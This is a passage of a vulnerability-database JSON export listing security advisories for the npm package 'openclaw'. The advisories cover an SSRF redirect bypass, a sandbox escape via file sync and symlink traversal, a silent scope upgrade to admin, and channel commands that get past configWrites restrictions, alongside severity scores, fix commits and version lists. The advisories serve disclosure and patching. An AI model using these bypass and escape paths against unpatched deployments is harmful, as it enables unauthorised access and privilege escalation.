ystem":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42430","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42430"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling"},{"reference_url":"https://github.com/advisories/GHSA-w8g9-x8gx-crmm","reference_id":"GHSA-w8g9-x8gx-crmm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w8g9-x8gx-crmm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42430","GHSA-w8g9-x8gx-crmm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-haxd-ps1x-h3ch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89349?format=json","vulnerability_id":"VCID-hd4w-s3dp-nubj","summary":"OpenClaw: OpenShell Mirror Sync — Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n## Summary\nOpenShell Mirror Sync: Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still has the mirror-boundary bug because shipped c02ee8 only excluded hooks while unreleased 3b9dab is the first full symlink-free upload and download hardening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n- `3b9dab0ece4643a9643e6a45459f5c709d3ce320` — 2026-03-30T14:51:44+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41397","reference_id":"","reference_type":"","scores":[{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.2259","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22636","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22651","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41397"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41397","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41397"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal"},{"reference_url":"https://github.com/advisories/GHSA-cwf8-44x6-32c2","reference_id":"GHSA-cwf8-44x6-32c2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwf8-44x6-32c2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41397","GHSA-cwf8-44x6-32c2"],"risk_score":4.3,"exploitability":"0.5","weighted_severity":"8.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hd4w-s3dp-nubj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91601?format=json","vulnerability_id":"VCID-hkqd-6khg-m3hj","summary":"OpenClaw: Silent privilege escalation via gateway shared-auth reconnect\n## Summary\n\nGateway local shared-auth reconnect silently widens paired device scope from operator.read to operator.admin and reach node RCE\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSilent local shared-auth reconnects could previously auto-approve `scope-upgrade` requests and widen a paired device from `operator.read` to `operator.admin`. Commit `81ebc7e0344fd19c85778e883bad45e2da972229` blocks silent reconnect scope upgrades so widened scopes require an explicit pairing approval instead of an implicit local reconnect path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81ebc7e0344fd19c85778e883bad45e2da972229`.\n\n## Fix Commit(s)\n\n- `81ebc7e0344fd19c85778e883bad45e2da972229`","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8"},{"reference_url":"https://github.com/advisories/GHSA-fqw4-mph7-2vr8","reference_id":"GHSA-fqw4-mph7-2vr8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fqw4-mph7-2vr8"}],"fixed_packages":[],"aliases":["GHSA-fqw4-mph7-2vr8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hkqd-6khg-m3hj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91836?format=json","vulnerability_id":"VCID-hse8-g1e9-dbay","summary":"OpenClaw: Channel commands could bypass account-scoped `configWrites` restrictions\n## Summary\nIn affected versions of `openclaw`, channel-initiated config mutations were authorized against the originating account's `configWrites` policy but did not consistently re-check the targeted account scope. An authorized sender on one account could mutate protected sibling-account configuration when the target account had `configWrites: false`.\n\n## Impact\nThis is an account-scoped policy bypass inside a single gateway deployment. Channel commands such as `/config set channels.<provider>.accounts.<id>...` and config-backed `/allowlist ... --config --account <id>` could modify protected sibling-account configuration.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe mutation path validated the origin account scope but did not consistently authorize every resolved target scope. Ambiguous collection and root writes under `channels` and `channels.<provider>.accounts` could therefore reach protected account configuration from channel command surfaces.\n\n## Fix\nOpenClaw now authorizes config mutations against both the origin scope and each resolved target scope, and it rejects ambiguous root and collection writes from channel commands unless the caller is an internal gateway client with `operator.admin`. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8jhh-jcqg-mj5p","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8jhh-jcqg-mj5p"},{"reference_url":"https://github.com/advisories/GHSA-8jhh-jcqg-mj5p","reference_id":"GHSA-8jhh-jcqg-mj5p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jhh-jcqg-mj5p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulne